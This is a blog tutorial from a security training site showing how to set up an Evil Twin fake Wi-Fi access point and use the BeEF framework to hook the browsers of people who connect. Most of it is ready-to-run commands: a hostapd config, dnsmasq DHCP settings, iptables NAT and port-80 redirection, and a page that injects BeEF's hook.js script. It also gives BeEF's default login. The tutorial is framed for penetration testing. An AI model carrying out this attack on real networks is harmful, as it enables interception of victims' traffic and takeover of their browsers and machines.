Coming mid-July
Cybrary Reimagined.
People first, Security first.
Coming mid-July.
Cybrary Reimagined.
Celebrate Cybersecurity Awareness Month with our buy 2, get 1 offer!
People first, Security first.
Valid until October 31. Elevate your skills today!
Start for free
Using Wireless Evil Twin and BeEF to Compromise Target Machines - Cybrary

Hello all,

I'm the author of Infernal Wireless Suite. Today, I'd like to teach you how to perform an Evil Twin attack, along with utilizing the BeEF Framework to compromise a target machine during penetration tests or red team exercises.

First thing first, what is an Evil Twin attack?

An Evil Twin attack is when you attempt to impersonate a wireless access point and lure probing devices to connect to you. This way, you're acting as a legitimate access point and proving internet through your own internet access interface. Any victim connected to your fake access point would be subject to data interception. More information can be found here: https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)

Second, what is the BeEF Framework ?

BeEF is browser exploitation framework focused on browser exploitation. This framework is used mainly during penetration test and via JavaScript injection into the browser content, mainly via XSS exploitation or content manipulation. This tool allows the attacker to take control of compromised machine, insert key logger and much more. You can find more information here: http://beefproject.com/

Now, as the title implies, I'd like to show you one of the attack vectors I implemented in my tool, infernal wireless, and I wanted to show you how to do it manually.

Warning:

This tutorial is only for educational and professional use.

Please don't use for illegal purposes!!

Note:

My network cards are as follows:

wlan0 - wireless Interface name, yours might be different, replace if needed

eth0 - internet facing interface name, yours might be different, replace if needed

Prerequisites:

Preferred OS: Kali Linux

Install: hostapd,  dnsmasq, BeeF Framework

First, we need to create a fake Access Point with a desired name.

Step 1: Create a configuration file for hostapd

Type the following into a free_AP.conf and save it.

interface=wlan0 # (change this if it differs from yours)

driver=nl80211

ssid= <fakeAPName> # you access Point name

channel=1

Execute:

hostapd free_AP.conf &

Step 2: Configure DNS Settings:

From a command prompt, execute below:

sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd

cat <<EOF > /etc/dnsmasq.conf

log-facility=/var/log/dnsmasq.log

#address=/#/10.0.0.1

#address=/google.com/10.0.0.1

interface=wlan0 # this is your wireless interface, change if different

dhcp-range=10.0.0.10,10.0.0.250,12h

dhcp-option=3,10.0.0.1

dhcp-option=6,10.0.0.1

#no-resolv

log-queries

EOF

Execute:

service dnsmasq start

Step 3 - Set up NAT Table:

Execute the following from the command line:

ifconfig wlan0 up

ifconfig wlan0 10.0.0.1/24

iptables -t nat -F

iptables -F

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT

echo '1' > /proc/sys/net/ipv4/ip_forward

Step 4 - Set up BeEF and HTTP Service:

From command line or by any other means you have, enable HTTP Service:

/etc/init.d/apache2 start

Create index.html under your root folder .i.e /var/www/html/index.html and write the code below:

<html>

<body>

<script src="http://10.0.0.1:3000/hook.js"></script>

</body>

</html>

Step 5 - Another iptable set up:

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80

iptables -t nat -A POSTROUTING -j MASQUERADE

Step 6 - Launch BeEF Framework:

From the command prompt, execute this:

firefox http://127.0.0.1:3000/ui/panel &

Login credentials are beef:beef

Now, it's just a matter of waiting till someone connects to your network.

The demo video can be seen here: https://www.youtube.com/watch?v=pVY5azLJMPY

Now, wait. If you want to use the automated too that I created, you may download here: https://github.com/entropy1337/infernal-twin

Thank you

Start learning with Cybrary

Create a free account

Related Posts

All Blogs